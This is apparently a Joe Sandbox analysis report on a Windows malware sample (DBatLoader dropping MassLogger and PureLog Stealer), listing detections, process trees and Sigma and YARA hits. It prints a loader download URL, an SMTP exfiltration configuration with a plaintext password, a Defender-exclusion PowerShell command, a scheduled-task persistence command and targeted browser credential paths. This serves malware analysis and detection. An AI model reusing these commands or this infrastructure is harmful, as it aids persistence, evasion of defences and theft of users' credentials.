Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_B2W984.com

Overview

General Information

Sample name:PO_B2W984.com
Analysis ID:1583547
MD5:f7d9ffe252e26320f26a76fc3f239c50
SHA1:1b12238410d619f0797042ca0777d7c05b08f410
SHA256:9654cbd553df628f50a99ec6f8b405901898c3c9eb99c8a3ba4fbd586290948b
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Submitted file has a suspicious file extension
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Drops large PE files
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PO_B2W984.com (PID: 5980 cmdline: "C:\Users\user\Desktop\PO_B2W984.com" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1684 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 5464 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • Trading_AIBot.exe (PID: 1008 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 6640 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 5628 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7732 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
          • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • apihost.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 785BCB4933871B92E40A89544BFA615E)
      • Microsofts.exe (PID: 4824 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • Oupzhkpr.PIF (PID: 3888 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 5540 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Oupzhkpr.PIF (PID: 2840 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: F7D9FFE252E26320F26A76FC3F239C50)
    • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • rpkhzpuO.pif (PID: 6980 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\Microsofts.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\Microsofts.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data
        • 0x15a27:$a5: \Kometa\User Data\Default\Login Data

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1fdd0:$s5: delete[]
              • 0x1f288:$s6: constructor or from DllMain.
              00000000.00000003.22895700001.000000007FCD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                Click to see the 23 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  19.2.rpkhzpuO.pif.335e0000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    19.2.rpkhzpuO.pif.30783f56.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      19.2.rpkhzpuO.pif.32f70000.9.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        15.2.rpkhzpuO.pif.2da40f08.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 51 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\Desktop\PO_B2W984.com" , ParentImage: C:\Users\user\Desktop\PO_B2W984.com, ParentProcessId: 5980, ParentProcessName: PO_B2W984.com, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 5464, ProcessName: rpkhzpuO.pif
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                          Sigma detected: Parent in Public Folder Suspicious Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Oupzhkpr.PIF" , ParentImage: C:\Users\Public\Libraries\Oupzhkpr.PIF, ParentProcessId: 3888, ParentProcessName: Oupzhkpr.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 1420, ProcessName: cmd.exe
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Oupzhkpr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_B2W984.com, ProcessId: 5980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oupzhkpr
                          Sigma detected: Execution of Suspicious File Type Extension
                          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\rpkhzpuO.pif, NewProcessName: C:\Users\Public\Libraries\rpkhzpuO.pif, OriginalFileName: C:\Users\Public\Libraries\rpkhzpuO.pif, ParentCommandLine: "C:\Users\user\Desktop\PO_B2W984.com" , ParentImage: C:\Users\user\Desktop\PO_B2W984.com, ParentProcessId: 5980, ParentProcessName: PO_B2W984.com, ProcessCommandLine: C:\Users\Public\Libraries\rpkhzpuO.pif, ProcessId: 5464, ProcessName: rpkhzpuO.pif
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7732, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7732, ProcessName: schtasks.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1008, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 6640, ProcessName: powershell.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-03T02:47:08.540332+010020283713Unknown Traffic192.168.11.204974741.185.8.252443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-03T02:47:14.889412+010028032742Potentially Bad Traffic192.168.11.2049748132.226.8.16980TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Found malware configuration
                          Source: PO_B2W984.comMalware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
                          Source: 6.0.Microsofts.exe.800000.0.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeReversingLabs: Detection: 79%
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFReversingLabs: Detection: 27%
                          Multi AV Scanner detection for submitted file
                          Source: PO_B2W984.comReversingLabs: Detection: 27%
                          Source: PO_B2W984.comVirustotal: Detection: 36%Perma Link
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeJoe Sandbox ML: detected
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: PO_B2W984.comJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Tries to detect the country of the analysis system (by using the IP)
                          Source: unknownDNS query: name: reallyfreegeoip.org

                          Compliance

                          barindex
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 15.2.rpkhzpuO.pif.400000.0.unpack
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifUnpacked PE file: 19.2.rpkhzpuO.pif.400000.0.unpack
                          Source: PO_B2W984.comStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49749 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.11.20:49747 version: TLS 1.2
                          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb*Q source: rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000003.23071203235.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B721000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23186060889.000000002E85C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rpkhzpuO.pif, 0000000F.00000003.23070008388.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23068650639.000000002B780000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23152181055.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23151187278.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23153094806.000000002E8BF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: easinvoker.pdb source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C10000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ECF0000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A20000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020C5D000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: _.pdb source: rpkhzpuO.pif, 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: dows\symbols\dll\mscorlib.pdbS source: rpkhzpuO.pif, 0000000F.00000002.23109676776.000000002B780000.00000004.00000020.00020000.00000000.sdmp
